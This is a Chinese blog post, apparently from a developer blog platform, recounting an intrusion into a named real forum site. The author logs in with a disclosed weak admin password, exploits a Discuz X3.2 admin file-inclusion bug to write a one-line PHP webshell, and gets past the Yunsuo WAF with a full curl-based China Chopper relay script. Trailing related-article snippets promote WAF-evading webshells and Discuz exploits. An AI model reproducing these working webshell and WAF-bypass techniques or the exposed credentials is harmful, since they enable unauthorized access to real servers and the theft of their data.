过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)

最新推荐文章于 2021-08-01 16:18:02 发布
最新推荐文章于 2021-08-01 16:18:02 发布
阅读量219 收藏
点赞数
文章标签: 过云锁php大马

直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer

f92bc6b2301150a6d4a65f3e60d07b9a.png

进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考WooYun: Discuz3.2后台文件包含漏洞可后台拿shell具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器具体IP添加到本地host里面去,否则云锁waf会拦截的(至于怎么获得具体IP,最简单的是发送邮件测试)通过后台“文件检验”功能,我们能清楚的看到一句话文件成功生成了

f5c5643bffd1737dad33692bf1775f84.png

我们浏览器访问看看

ab532133a19f60e9e5a4accac691f848.png

被云锁waf拦截了,估计菜刀肯定也连不了

e4b597cc89ac535b5400bc92bb3ba119.png

果不其然,也被拦了,乌云zone翻了下前辈们的经验之谈,终于突破了,重点请往下看1、变形一句话

$_REQUEST['a']($_REQUEST['b']);

?>

1

2

3

$_REQUEST['a']($_REQUEST['b']);

?>

按上面getshell的方法重新将一句话写入根目录,得访问地址http://bbs.sudu.cn/help.php测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();

3e4d4fee0954e753a78358a08504cb6d.png

2、新建shell.php,填入菜刀中转脚本

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POST as $k=>$v)

{

if(strstr($v, "base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch = curl_init();

$curl_url = $target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch, CURLOPT_URL, $curl_url);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($ch);

curl_close($ch);

echo $result;

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POSTas$k=>$v)

{

if(strstr($v,"base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch=curl_init();

$curl_url=$target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch,CURLOPT_URL,$curl_url);

curl_setopt($ch,CURLOPT_POST,1);

curl_setopt($ch,CURLOPT_POSTFIELDS,$poststr);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$result=curl_exec($ch);

curl_close($ch);

echo$result;

?>

3、本地搭建php环境,将中转脚本置于中,菜刀中连接,地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b

d5cfcef27c6281683acb0b49508eedde.png

成功突破,如图

768cc85d7a6fad61eb983ffae3f676d3.png

weixin_39776239
关注
php大马waf
04-28
php大马waf,,......................................................................................................
过云锁php大马,过云锁注入技巧 | CN-SEC 中文网
weixin_29807507的博客
03-10 225
摘要win03 + apache + php + 云锁最新版win_3.1.6 第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被过。这里主要介绍下如何过正则。先贴payload:环境win03 + apache + php + 云锁最新版win_3.1.6过第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被过。这里主要介绍下如何过正...
2019最新过狗过,云锁,360等WAFPHP免杀大马
03-20
2019最新过狗过,云锁,360等WAFPHP免杀大马等主流防护软件,2019最新大马下载PHP
云锁 php一句话,关于php一句话免杀的分析<转载>
weixin_33542924的博客
03-23 313
一开始想这样: 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost附加数据. 这中间考虑了这些: ...
华夏名网网站宝 v2.2.5520.30130.zip
07-17
华夏名网网站宝是一款集一键自动安装PHP、MYSQL、PAPMYADMIN、ASP上传组件等WEB服务器环境,快速建站、数据库管理、站点信息监控、硬件温度检测、WebShell实时查杀为一体的全能服务器建站助手软件。 华夏名网网站宝...
如何部署war包到华夏名网服务器
最新发布
07-27
很抱歉,由于我是一个AI模型,无法直接提供关于华夏名网服务器的具体部署方法。但是,一般来说,将WAR包部署到服务器的步骤大致如下: 1. 登录到服务器:使用SSH等工具登录到华夏名网服务器。 2. 安装Java环境:...
javaScript DOM方法和属性摘要-Javascript教程-技术资讯-华夏名网资讯中心 虚拟主机,域名注册,双线虚拟主机,服务器租赁,为7万用户提供服务.mht
10-17
javaScript DOM方法和属性摘要-Javascript教程-技术资讯-华夏名网资讯中心 虚拟主机,域名注册,双线虚拟主机,服务器租赁,为7万用户提供服务.mhtjavaScript DOM方法和属性摘要-Javascript教程-技术资讯-华夏名网资讯...
二环路网站云盒子 v0.9.1
11-02
如果我没有用华夏名网的服务器或云主机,我能不能用二环路?当然可以,虽然二环路是我们多年技术的结晶,但是它是免费的,我们没有限制,因为您将来也可能是我们的客户。下面是二环路云主机的功能介绍:Web服务器...
二环路网站云盒子 v0.9.1.exe
07-17
如果我没有用华夏名网的服务器或云主机,我能不能用二环路? 当然可以,虽然二环路是我们多年技术的结晶,但是它是免费的,我们没有限制,因为您将来也可能是我们的客户。 下面是二环路云主机的功能介绍: [Web...
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
过云锁php木马,waf的另类木马文件攻击方法
weixin_34260080的博客
03-12 456
很久没写文章了,继上次发先文章到今天已经很久了;很久没写文章了,继上次发先文章到今天已经很久了;今天突发异想;因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章分享下;首先我打算分享几种。一:动态调用​首先,一些waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉,其实在...
php回调后门,phpWAF一句话,php最新一句话,php过狗一句话.
SetToken的博客
03-21 7771
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 http://pan.baidu.com/s/1jHoJxHW China chopper http://pan.baidu.com/s/1eRxEYjC 分享一下,一些不需要动态函数、
Discuz漏洞
W_seventeen的博客
08-01 4925
1、漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
DZ拿shell总结
weixin_30600503的博客
01-23 783
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
热门推荐
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
Discuz! ML RCE漏洞 getshell 复现
weixin_30425949的博客
07-15 545
0x01 影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 0x02 环境搭建 直接官网下载即可http://discuz.ml/download 将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装 之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装 0x03 漏洞Poc ...
home.php mod spacecp,DiscuzX3后台getshell详细利用方法图解
weixin_39567870的博客
04-04 1496
上班后看到wooyun社区发布了一个discuzx3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!经过研究发现,步骤错了。。。。用户 ? 用户栏目 ? 栏目分组 ? 提交 ? 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)Content-Disposition:fo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值